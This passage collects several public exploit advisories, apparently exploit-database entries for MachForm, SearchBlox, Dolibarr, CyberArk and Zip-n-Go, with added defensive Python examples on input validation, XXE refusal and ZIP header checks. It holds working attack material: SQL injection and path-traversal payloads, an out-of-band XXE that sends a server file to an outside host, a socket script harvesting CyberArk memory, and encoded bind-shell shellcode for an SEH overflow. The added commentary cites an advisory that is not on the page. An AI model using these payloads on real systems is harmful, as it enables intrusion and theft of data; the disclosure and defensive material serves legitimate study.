the corresponding security codes. Also, the arbitrary file upload can let an
attacker take control of the server by uploading a web shell.

[1] SQL injection (CVE-2018-6410):
-------------------------

[1.1] Description:
The software is subject to SQL injections in the ‘download.php’ file.

[1.2] Parameters and statement:
This SQLi can be found in the parameter ‘q’, which is a base64-encoded value
carrying the following parameters:

  $form_id = $params['form_id'];
  $id      = $params['id'];
  $field_name = $params['el'];
  $file_hash  = $params['hash'];


So the injectable parameters are ‘el’ and ‘form_id’, which allow error-based,
stacked-query and time-based blind SQL injection. This is due to the
following vulnerable statement:

  $query = "select {$field_name} from `".MF_TABLE_PREFIX."form_{$form_id}`
where id=?";


[1.3] POC
Proof of concept to get the first user mail:
  http:// [URL] / [Machform_folder] /download.php?q=
ZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgy
MDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3Vz
ZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1Io
UkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RF
Ul9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=

Which is the base64 encoding for:
  el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT
MID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT
0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP
BY x)a) ;&id=1&hash=1&form_id=1


[2] Path traversal (CVE-2018-6409):
-----------------------------------

[2.1] Description
‘download.php’ is used to serve the files stored with form answers.
Modifying the name of the file to serve in the corresponding ap_form table
leads to a path traversal vulnerability.

[2.2] POC
First we need to change the name for the element on the form:
update ap_form_58009 set element_4="../../../../../../../../../../../../../../../../etc/passwd" where id=1;

Now in order to be able to download it, we need to access:
  http:// [URL] / [Machform_folder] /download.php?q=
ZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0
NTgmZm9ybV9pZD01ODAwOQo=

Which is the base64 encoding for;
  el=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009

Note that hash is the MD5 of the corresponding filename:
  md5("../../../../../../../../../../../../../../../../etc/passwd") =
402ba0230d6f44a2de590ac11107a458

[3] Bypass file upload filter (CVE-2018-6411):
----------------------------------------------

When the form is set to filter with a blacklist, it automatically adds dangerous
extensions to the filter.
If the filter is set to a whitelist, the dangerous extensions can be
bypassed.

This can be done directly on the database via SQLi:
update ap_form_elements set element_file_type_list="php",
element_file_block_or_allow="a" where form_id=58009 and element_id=4;

Once uploaded, the file can be found and executed at the following URL:
http:// [URL] / [Machform_folder] /data/form_58009/files/ [filename]

The filename can be found in the database:
SELECT element_4 FROM ap_form_58009 WHERE id=1;
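The three MachForm issues share one root: values read from the request or from the database (`el`, `form_id`, the stored file name, the per-form extension list) flow into a query, a file path or an upload decision without being checked for shape. The functions below are an added example written for this page, not MachForm code; the `ap_form_<id>` / `element_<n>` naming follows the advisory, while the data directory, the dangerous-extension set and the sample values are assumptions. Identifiers cannot be bound as query parameters, so the first function validates them against a strict pattern; the second confines a stored file name to the form's upload directory; the third refuses executable extensions regardless of how the form's allow/block mode is configured in the database.

```python
import posixpath
import re
from pathlib import PurePosixPath

# Assumptions: placeholder data directory and a minimal dangerous-extension set.
DATA_ROOT = "/var/www/machform/data"
DANGEROUS_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht",
                 "cgi", "pl", "py", "sh", "exe", "htaccess", "jsp", "asp", "aspx"}


def build_download_query(form_id, field_name):
    """Identifiers cannot be bound as parameters, so each one is checked against
    a strict pattern before it is placed in the statement; the row id stays a
    bound parameter ('?')."""
    if not re.fullmatch(r"[1-9]\d{0,8}", form_id):
        raise ValueError("form_id must be a small positive integer")
    if not re.fullmatch(r"element_\d{1,4}", field_name):
        raise ValueError("el must name an element_<n> column")
    return "SELECT `%s` FROM `ap_form_%s` WHERE id = ?" % (field_name, form_id)


def resolve_stored_file(form_id, stored_name):
    """Map a file name read from the database to a path that is guaranteed to stay
    inside that form's upload directory, even if the DB value was tampered with."""
    if not re.fullmatch(r"[1-9]\d{0,8}", form_id):
        raise ValueError("form_id must be a small positive integer")
    # Only a bare file name is acceptable: separators, '..' and NUL are refused.
    if (not stored_name or "\x00" in stored_name or "\\" in stored_name
            or stored_name in (".", "..")
            or PurePosixPath(stored_name).name != stored_name):
        raise ValueError("stored file name is not a bare file name")
    base = posixpath.join(DATA_ROOT, "form_%s" % form_id, "files")
    target = posixpath.normpath(posixpath.join(base, stored_name))
    # Lexical containment check as a second line of defence (no filesystem access).
    if posixpath.commonpath([base, target]) != base:
        raise ValueError("resolved path escapes the upload directory")
    return target


def upload_allowed(filename, allowed_exts):
    """Allow-list only. Executable extensions are refused on any name segment, so
    'shell.php.jpg' fails, and so does a database-side allow-list of 'php'."""
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return False
    if any(p in DANGEROUS_EXT for p in parts[1:]):
        return False
    return parts[-1] in {e.lower().lstrip(".") for e in allowed_exts}


def rejects(fn, *args):
    """Small self-check helper: True if fn(*args) raises ValueError."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False
```

With the identifier check in place, the whole injected `el` value from [1.3] is refused before any query text is built, and the traversal name from [2.2] never reaches the filesystem because it is not a bare file name.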
            
# Exploit Title: SearchBlox 8.6.7 Out-Of-Band XML eXternal Entity (OOB-XXE)
# Exploit Author: Ahmet GUREL, Canberk BOLAT
# Software Link: https://www.searchblox.com/
# Version: < = SearchBlox Version 8.6.7
# Platform: Java
# Tested on: Windows
# CVE: CVE-2018-11586

# 1. DETAILS

An XML External Entity attack is a type of attack against an
application that parses XML input. This attack occurs when XML input
containing a reference to an external entity is processed by a weakly
configured XML parser. This attack may lead to the disclosure of
confidential data, denial of service, server side request forgery,
port scanning from the perspective of the machine where the parser is
located, and other system impacts. Reference:
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing

# 2. PoC:

XML external entity (XXE) vulnerability in /searchblox/api/rest/status in
SearchBlox 8.6.7 allows remote unauthenticated users to read arbitrary
files or conduct server-side request forgery (SSRF) attacks via a crafted
DTD in an XML request.

HTTP Request:
_____________

GET /searchblox/api/rest/status HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=n9uolja8nwkj15nsv66xjlzci;
XSRF-TOKEN=6098a021-0e3c-409f-9da0-b895eff3025d; AdsOnPage=5;
AdsOnSearchPage=5
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 140

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE xxe [
 <!ENTITY % dtd SYSTEM "http://192.168.1.2:7000/ext.dtd">
%dtd;
%all;
%send;]>

#Ext.dtd File :
_______________

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % file SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % all "<!ENTITY &#37; send SYSTEM 'http://192.168.1.2:7000/?%file;
'>">
%all;

#HTTP Response:
_______________

Ahmets-MacBook-Pro:Desktop ahmet$ python -m SimpleHTTPServer 7000
Serving HTTP on 0.0.0.0 port 7000 ...
192.168.1.2 - - [03/Jun/2018 15:37:16] "GET /ext.dtd HTTP/1.1" 200 -
192.168.1.2 - - [03/Jun/2018 15:37:16] "GET
/?;%20for%2016-bit%20app%20support%20[fonts]%20[extensions]%20[mci%20extensions]%20[files]%20[Mail]%20MAPI=1
HTTP/1.1" 200 -
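The request above only works because the endpoint hands client-supplied XML to a parser that honours the DOCTYPE and fetches the external parameter entity. The function below is an added example written for this page, not SearchBlox code, and the size limit is an assumption. Rather than relying on per-parser feature flags, it refuses any document that contains a DOCTYPE or ENTITY declaration at all: without a DTD there is no way to declare an external entity (the `file:///` and `http://` references in the PoC) or an expansion bomb. It also fails closed on anything that is not single-byte text, so re-encoding the body as UTF-16 cannot hide the keyword from the check.

```python
import re
import xml.etree.ElementTree as ET

MAX_XML_BYTES = 1 << 20  # assumption: the status API never needs more than 1 MiB
DTD_RE = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


class UnsafeXML(ValueError):
    """Raised when a request body is refused before parsing."""


def parse_untrusted_xml(data):
    """Parse client-supplied XML with DTD processing taken off the table.

    Accepts raw bytes, rejects oversized bodies, rejects anything that is not
    8-bit text (UTF-16/32 would interleave NULs), and rejects any DOCTYPE or
    ENTITY declaration, even inside a comment: fail closed, never try to be clever."""
    if not isinstance(data, bytes):
        raise TypeError("expected raw bytes from the request body")
    if len(data) > MAX_XML_BYTES:
        raise UnsafeXML("document exceeds size limit")
    if b"\x00" in data[:1024]:
        raise UnsafeXML("only single-byte encodings (UTF-8/ASCII) are accepted")
    m = DTD_RE.search(data)
    if m:
        raise UnsafeXML("DTD construct %s is not allowed" % m.group(1).decode().upper())
    return ET.fromstring(data)


def rejects(data):
    """Self-check helper: True if parse_untrusted_xml refuses the document."""
    try:
        parse_untrusted_xml(data)
    except UnsafeXML:
        return True
    return False


# Constructed body in the shape of the PoC above (the DTD URL is a placeholder).
XXE_DOC = (b'<?xml version="1.0" encoding="UTF-8" ?>\n'
           b'<!DOCTYPE xxe [\n <!ENTITY % dtd SYSTEM "http://attacker.invalid/ext.dtd">\n'
           b'%dtd;\n%all;\n%send;]>\n<status/>')
# Constructed benign request, and the same request re-encoded as UTF-16.
BENIGN_DOC = b'<?xml version="1.0"?><status><component name="index">ok</component></status>'
UTF16_DOC = BENIGN_DOC.decode("ascii").encode("utf-16")
```

Escaped text such as `&lt;!DOCTYPE` inside an element is still accepted, because the pattern looks for the raw markup, not the characters it decodes to.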
            
# [CVE-2018-10094] Dolibarr SQL Injection vulnerability


## Description

Dolibarr is an "Open Source ERP & CRM for Business" used by many
companies worldwide.

It is available through [GitHub](https://github.com/Dolibarr/dolibarr)
or as distribution packages (e.g. a .deb package).

**Threat**

The application does not handle user input properly and allows execution
of arbitrary SQL commands on the database.

**Expectation**

Prepared statements should be used so that user input cannot alter the
structure of the SQL query.


## Vulnerability type

**CVE ID**: CVE-2018-10094

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-89

**CVSS Base Score**: 7.5

**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N


## Details

The database connector escapes quotes with the `real_escape_string()`
wrapper. However, it is still possible to perform injection on integer
parameters, which are used without quotes.

```php
mysqli.class.php

    /**
     *  Escape a string to insert data
     *
     *  @param  string  $stringtoencode     String to escape
     *  @return string                      String escaped
     */
    function escape($stringtoencode)
    {
        return $this->db->real_escape_string($stringtoencode);
    }
```

Additional checks are defined later, which forbid some SQL keywords (e.g.
`union`, `create`, `insert`). However, by URL-encoding the payload,
these checks are bypassed.

```php
main.inc.php

/**
 * Security: SQL Injection and XSS Injection (scripts) protection (Filters on GET, POST, PHP_SELF).
 *
 * @param       string      $val        Value
 * @param       string      $type       1=GET, 0=POST, 2=PHP_SELF
 * @return      int                     >0 if there is an injection
 */
function test_sql_and_script_inject($val, $type)
{
    $inj = 0;
    // For SQL Injection (only GET are used to be included into bad escaped SQL requests)
    if ($type == 1)
    {
        $inj += preg_match('/updatexml\(/i',     $val);
        $inj += preg_match('/delete\s+from/i',   $val);
        $inj += preg_match('/create\s+table/i',  $val);
        $inj += preg_match('/insert\s+into/i',   $val);
        $inj += preg_match('/select\s+from/i',   $val);
        $inj += preg_match('/into\s+(outfile|dumpfile)/i',  $val);
    }
    if ($type != 2) // Not common, we can check on POST
    {
        $inj += preg_match('/update.+set.+=/i',  $val);
        $inj += preg_match('/union.+select/i',   $val);
        $inj += preg_match('/(\.\.%2f)+/i',      $val);
    }
    // For XSS Injection done by adding javascript with script
    // This is all cases a browser consider text is javascript:
    // When it found '<script', 'javascript:', '<style', 'onload\s=' on body tag, '="&' on a tag size with old browsers
    // All examples on page: http://ha.ckers.org/xss.html#XSScalc
    // More on https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
    $inj += preg_match('/<script/i', $val);
    $inj += preg_match('/<iframe/i', $val);
    $inj += preg_match('/Set\.constructor/i', $val);    // ECMA script 6
    if (! defined('NOSTYLECHECK')) $inj += preg_match('/<style/i', $val);
    $inj += preg_match('/base[\s]+href/si', $val);
    $inj += preg_match('/<.*onmouse/si', $val);       // onmousexxx can be set on img or any html tag like <img title='...' onmouseover=alert(1)>
    $inj += preg_match('/onerror\s*=/i', $val);       // onerror can be set on img or any html tag like <img title='...' onerror = alert(1)>
    $inj += preg_match('/onfocus\s*=/i', $val);       // onfocus can be set on input text html tag like <input type='text' value='...' onfocus = alert(1)>
    $inj += preg_match('/onload\s*=/i', $val);        // onload can be set on svg tag <svg/onload=alert(1)> or other tag like body <body onload=alert(1)>
    $inj += preg_match('/onclick\s*=/i', $val);       // onclick can be set on img text html tag like <img onclick = alert(1)>
    $inj += preg_match('/onscroll\s*=/i', $val);      // onscroll can be on textarea
    //$inj += preg_match('/on[A-Z][a-z]+\*=/', $val);   // To lock event handlers onAbort(), ...
    $inj += preg_match('/&#58;|&#0000058|&#x3A/i', $val);       // refused string ':' encoded (no reason to have it encoded) to lock 'javascript:...'
    //if ($type == 1)
    //{
        $inj += preg_match('/javascript:/i', $val);
        $inj += preg_match('/vbscript:/i', $val);
    //}
    // For XSS Injection done by adding javascript closing html tags like with onmousemove, etc... (closing a src or href tag with not cleaned param)
    if ($type == 1) $inj += preg_match('/"/i', $val);       // We refused " in GET parameters value
    if ($type == 2) $inj += preg_match('/[;"]/', $val);     // PHP_SELF is a file system path. It can contains spaces.
    return $inj;
}
```

## Proof of Concept : retrieving the database name.

Payload:

```
1) union select
0,1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#

Url-encoded payload:
%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%32%2c%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%23
```

```http
GET
/dolibarr/adherents/list.php?leftmenu=members&statut=%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%32%2c%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%23
HTTP/1.1
Host: dolibarr.lab:2080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie:
DOLSESSID_cac4a1e49e4040e845340fe919bd202b=qh3ot46kvm95ph0ddd3ujd7je5
Connection: close
Upgrade-Insecure-Requests: 1

...

</a>
             </td>
             <td>10.1.26-MariaDB-0+deb9u1</td>
             <td>2</td>
             <td></td>
             <td>1</td>
             <td>21</td>
             <td class="nowrap">
```
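The Dolibarr details above make two points worth seeing side by side: quote-escaping does nothing for a parameter that is compared without quotes (`statut` is an integer), and a keyword blacklist is a fragile second line. The same root cause sits behind the quoted `search` parameter in the Facebook Clone Script advisory earlier on this page. The snippet below is an added example written for this page, not code from either project; the in-memory SQLite table, its column names and the sample rows are constructed. Each vulnerable query is shown next to its hardened form, which validates the value's shape and binds it as a parameter instead of pasting it into the statement.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory table standing in for an application table
    (names are assumptions, not Dolibarr's or the clone script's schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE member (id INTEGER, login TEXT, statut INTEGER)")
    db.executemany("INSERT INTO member VALUES (?, ?, ?)",
                   [(1, "alice", 1), (2, "bob", 0), (3, "carol", 1)])
    return db


def escape(value):
    """What a real_escape_string()-style wrapper does: quotes and backslashes only."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def members_by_status_vulnerable(db, statut):
    # Integer column compared without quotes: escaping changes nothing here,
    # so the value is free to extend the statement (the advisory's point).
    sql = "SELECT id, login, statut FROM member WHERE statut = %s" % escape(statut)
    return db.execute(sql).fetchall()


def members_by_status_safe(db, statut):
    # Two layers: the value must look like an integer, and it is bound, never pasted.
    if not re.fullmatch(r"-?\d{1,9}", statut):
        raise ValueError("statut must be an integer")
    sql = "SELECT id, login, statut FROM member WHERE statut = ?"
    return db.execute(sql, (int(statut),)).fetchall()


def search_vulnerable(db, term):
    # Quoted string parameter built by concatenation, as in the 'search' PoC.
    sql = "SELECT id, login, statut FROM member WHERE login LIKE '%%%s%%'" % term
    return db.execute(sql).fetchall()


def search_safe(db, term):
    # The wildcard pattern is built in Python; the whole value is bound as one parameter.
    sql = "SELECT id, login, statut FROM member WHERE login LIKE ?"
    return db.execute(sql, ("%" + term + "%",)).fetchall()


def rejects(fn, *args):
    """Self-check helper: True if fn(*args) raises ValueError."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(members_by_status_safe(db, "1"))
    print(search_safe(db, "ali"))
```

Note that the safe versions do not try to recognise bad input by keyword; they define what good input looks like and let the database driver keep data and query text apart.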


## Affected versions

* Version 7.0.0 (last stable version as of March 2018) - previous
versions are probably also vulnerable but not tested

## Solution

Update to 7.0.2
([changelog](https://raw.githubusercontent.com/Dolibarr/dolibarr/develop/ChangeLog))

## Timeline (dd/mm/yyyy)

* 18/03/2018 : Initial discovery
* 17/04/2018 : Contact with the editor
* 17/04/2018 : Editor acknowledges the vulnerability
* 18/04/2018 : Editor announces fixes in version 7.0.2
* 21/05/2018 : Vulnerability disclosure

## Credits

* Issam RABHI (i dot rabhi at sysdream dot com)
* Kevin LOCATI (k dot locati at sysdream dot com)

-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream
            
# Exploit Title: CyberArk < 10 - Memory Disclosure
# Date: 2018-06-04
# Exploit Author: Thomas Zuk
# Vendor Homepage: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/
# Version: < 9.7 and < 10
# Tested on: Windows 2008, Windows 2012, Windows 7, Windows 8, Windows 10
# CVE: CVE-2018-9842

# Linux cmd line manual test: cat logon.bin | nc -vv IP 1858 | xxd
# paste the following bytes into a hexedited file named logon.bin:
#fffffffff7000000ffffffff3d0100005061636c695363726970745573657200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020202020ffffffff0000000000000000000073000000cececece00000000000000000000000000000000303d4c6f676f6efd3131353d372e32302e39302e3238fd36393d50fd3131363d30fd3130303dfd3231373d59fd3231383d5041434c49fd3231393dfd3331373d30fd3335373d30fd32323d5061636c6953637269707455736572fd3336373d3330fd0000


#!/usr/bin/python

import socket

ip = "10.107.32.21"
port = 1858

# CyberArk's port 1858 service speaks a proprietary protocol used for login and administrative operations.
# The bytes below are a sample login request, which is what is needed to receive the memory contents.

pacli_logon = "\xff\xff\xff\xff\xf7\x00\x00\x00\xff\xff\xff\xff\x3d\x01\x00\x00\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x20\x20\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x00\x00\x00\xce\xce\xce\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x3d\x4c\x6f\x67\x6f\x6e\xfd\x31\x31\x35\x3d\x37\x2e\x32\x30\x2e\x39\x30\x2e\x32\x38\xfd\x36\x39\x3d\x50\xfd\x31\x31\x36\x3d\x30\xfd\x31\x30\x30\x3d\xfd\x32\x31\x37\x3d\x59\xfd\x32\x31\x38\x3d\x50\x41\x43\x4c\x49\xfd\x32\x31\x39\x3d\xfd\x33\x31\x37\x3d\x30\xfd\x33\x35\x37\x3d\x30\xfd\x32\x32\x3d\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\xfd\x33\x36\x37\x3d\x33\x30\xfd\x00\x00"


for iteration in range(0, 110):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    # under Python 3 the escaped literal above is a str, so turn it back into the raw bytes
    payload = pacli_logon if isinstance(pacli_logon, bytes) else pacli_logon.encode("latin-1")
    s.sendall(payload)

    # receive response: discard the first 200 bytes, keep the next 1500
    s.recv(200)
    reply = s.recv(1500)

    # append the raw response to a file
    with open("cyberark_memory", "ab") as out:
        out.write(b"received: \n")
        out.write(reply)
        out.write(b"\n\n\n")

    s.close()
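The Zip-n-Go advisory that follows hand-assembles a ZIP archive whose local file header declares a file name length of 0x0fe4 (4068 bytes) while the name field itself holds a single byte; an archiver that copies the declared length into a fixed-size buffer overflows. From the consuming side, the defence is to trust no length field until it has been checked against the bytes actually present. The parser below is an added example written for this page, not Zip-n-Go code; the 1024-byte name cap is an assumption, the good archive is built in memory with Python's `zipfile`, and the malformed headers are constructed to match the advisory's layout.

```python
import io
import struct
import zipfile

LOCAL_HDR = struct.Struct("<4sHHHHHIIIHH")  # 30-byte local file header
EOCD = struct.Struct("<4sHHHHIIH")          # 22-byte end of central directory record
LOCAL_SIG = b"PK\x03\x04"
EOCD_SIG = b"PK\x05\x06"
MAX_NAME_LEN = 1024  # assumption: the longest file name this consumer will accept


class ZipFormatError(ValueError):
    """Raised for any header field that does not match the bytes on hand."""


def parse_local_header(buf, offset=0):
    """Parse one local file header; return (fields, offset of the file data).

    Every length read from the archive is checked against the bytes actually
    present before it is used, which is exactly the check a fixed-size name
    buffer needs."""
    if len(buf) - offset < LOCAL_HDR.size:
        raise ZipFormatError("truncated local file header")
    (sig, ver, flags, method, mtime, mdate, crc, csize, usize,
     name_len, extra_len) = LOCAL_HDR.unpack_from(buf, offset)
    if sig != LOCAL_SIG:
        raise ZipFormatError("bad local file header signature")
    if name_len > MAX_NAME_LEN:
        raise ZipFormatError("file name length %d exceeds cap %d" % (name_len, MAX_NAME_LEN))
    start = offset + LOCAL_HDR.size
    if start + name_len + extra_len > len(buf):
        raise ZipFormatError("declared name/extra length runs past end of data")
    name = buf[start:start + name_len]
    if b"\x00" in name:
        raise ZipFormatError("NUL byte in file name")
    fields = {"version": ver, "flags": flags, "method": method, "crc": crc,
              "compressed_size": csize, "uncompressed_size": usize,
              "name": name.decode("cp437"), "extra_len": extra_len}
    return fields, start + name_len + extra_len


def parse_eocd(buf):
    """Locate the end-of-central-directory record and check its offsets fit."""
    idx = buf.rfind(EOCD_SIG)
    if idx < 0 or len(buf) - idx < EOCD.size:
        raise ZipFormatError("end of central directory record not found")
    (sig, disk, cd_disk, n_here, n_total,
     cd_size, cd_offset, comment_len) = EOCD.unpack_from(buf, idx)
    if cd_offset + cd_size > idx:
        raise ZipFormatError("central directory does not fit before the EOCD record")
    if idx + EOCD.size + comment_len != len(buf):
        raise ZipFormatError("comment length does not match remaining bytes")
    return {"entries": n_total, "cd_offset": cd_offset, "cd_size": cd_size}


def make_sample_zip():
    """Constructed well-formed archive with one stored entry."""
    bio = io.BytesIO()
    with zipfile.ZipFile(bio, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("hello.txt", "hello")
    return bio.getvalue()


def make_bad_header(name_len):
    """Constructed header in the shape of the advisory's: the same version,
    time and date fields, the given name length, but only one byte of name."""
    return LOCAL_HDR.pack(LOCAL_SIG, 20, 0, 0, 0xACB7, 0x34CE, 0, 0, 0, name_len, 0) + b"\x00"


def rejects(buf):
    """Self-check helper: True if the local header is refused."""
    try:
        parse_local_header(buf)
    except ZipFormatError:
        return True
    return False
```

The two rejections differ in kind: 4068 trips the application's own cap, while a modest 100 trips the bounds check against the data actually supplied. A robust reader needs both, since a name that fits in the archive can still be longer than the buffer that will receive it.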
            
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title      : Zip-n-Go v4.9 - Local Buffer Overflow (SEH)                                         #
# Exploit Author     : Hashim Jawad - @ihack4falafel                                                       #
# Vendor Homepage    : http://mc1soft.com/index.shtml                                                      #
# Vulnerable Software: http://mc1soft.com/files/zip-n-go49old.exe                                          #
# Tested on          : Windows 7 Enterprise - SP1 (x86)                                                    #
#----------------------------------------------------------------------------------------------------------#

# Disclosure Timeline:
# ====================
# 05-28-18: Contacted vendor, no response 
# 05-30-18: Contacted vendor again, responded with patch and requested further testing
# 05-30-18: Patch did not seem to fix the problem and alternative approach were suggested
# 05-31-18: Vendor applied new patch and requested further testing
# 05-31-18: The new patch nullified the vulnerability
# 06-03-18: Version 4.95 was released  
# 06-03-18: Proof of concept exploit published

#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=EAX -f python -v shellcode
#Payload size: 710 bytes
shellcode =  ""
shellcode += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x39\x6c\x5a\x48\x6e\x62\x43\x30"
shellcode += "\x45\x50\x73\x30\x61\x70\x6d\x59\x7a\x45\x46\x51"
shellcode += "\x39\x50\x72\x44\x4e\x6b\x52\x70\x30\x30\x6c\x4b"
shellcode += "\x52\x72\x56\x6c\x6c\x4b\x73\x62\x37\x64\x4c\x4b"
shellcode += "\x32\x52\x51\x38\x54\x4f\x6f\x47\x31\x5a\x61\x36"
shellcode += "\x50\x31\x79\x6f\x4c\x6c\x35\x6c\x31\x71\x51\x6c"
shellcode += "\x47\x72\x46\x4c\x71\x30\x59\x51\x5a\x6f\x44\x4d"
shellcode += "\x56\x61\x6b\x77\x38\x62\x69\x62\x72\x72\x43\x67"
shellcode += "\x6e\x6b\x43\x62\x32\x30\x6c\x4b\x33\x7a\x55\x6c"
shellcode += "\x6c\x4b\x32\x6c\x34\x51\x34\x38\x6d\x33\x37\x38"
shellcode += "\x57\x71\x4a\x71\x66\x31\x6c\x4b\x42\x79\x51\x30"
shellcode += "\x65\x51\x59\x43\x4c\x4b\x52\x69\x45\x48\x6b\x53"
shellcode += "\x77\x4a\x47\x39\x4e\x6b\x76\x54\x4e\x6b\x46\x61"
shellcode += "\x58\x56\x36\x51\x59\x6f\x6e\x4c\x49\x51\x4a\x6f"
shellcode += "\x76\x6d\x35\x51\x68\x47\x57\x48\x49\x70\x62\x55"
shellcode += "\x48\x76\x56\x63\x31\x6d\x4a\x58\x55\x6b\x73\x4d"
shellcode += "\x35\x74\x33\x45\x4b\x54\x52\x78\x6c\x4b\x46\x38"
shellcode += "\x51\x34\x56\x61\x59\x43\x33\x56\x6c\x4b\x76\x6c"
shellcode += "\x50\x4b\x4e\x6b\x46\x38\x75\x4c\x67\x71\x68\x53"
shellcode += "\x6c\x4b\x34\x44\x4e\x6b\x47\x71\x78\x50\x4b\x39"
shellcode += "\x47\x34\x57\x54\x55\x74\x33\x6b\x33\x6b\x55\x31"
shellcode += "\x31\x49\x50\x5a\x42\x71\x4b\x4f\x4b\x50\x31\x4f"
shellcode += "\x31\x4f\x72\x7a\x4c\x4b\x54\x52\x6a\x4b\x6c\x4d"
shellcode += "\x31\x4d\x62\x48\x46\x53\x50\x32\x77\x70\x43\x30"
shellcode += "\x72\x48\x70\x77\x30\x73\x35\x62\x43\x6f\x50\x54"
shellcode += "\x70\x68\x72\x6c\x71\x67\x67\x56\x47\x77\x49\x6f"
shellcode += "\x68\x55\x6e\x58\x4c\x50\x43\x31\x45\x50\x53\x30"
shellcode += "\x46\x49\x78\x44\x33\x64\x62\x70\x50\x68\x76\x49"
shellcode += "\x4f\x70\x42\x4b\x43\x30\x69\x6f\x69\x45\x73\x5a"
shellcode += "\x67\x78\x31\x49\x42\x70\x6a\x42\x59\x6d\x71\x50"
shellcode += "\x32\x70\x73\x70\x36\x30\x70\x68\x78\x6a\x36\x6f"
shellcode += "\x69\x4f\x6d\x30\x6b\x4f\x69\x45\x4f\x67\x63\x58"
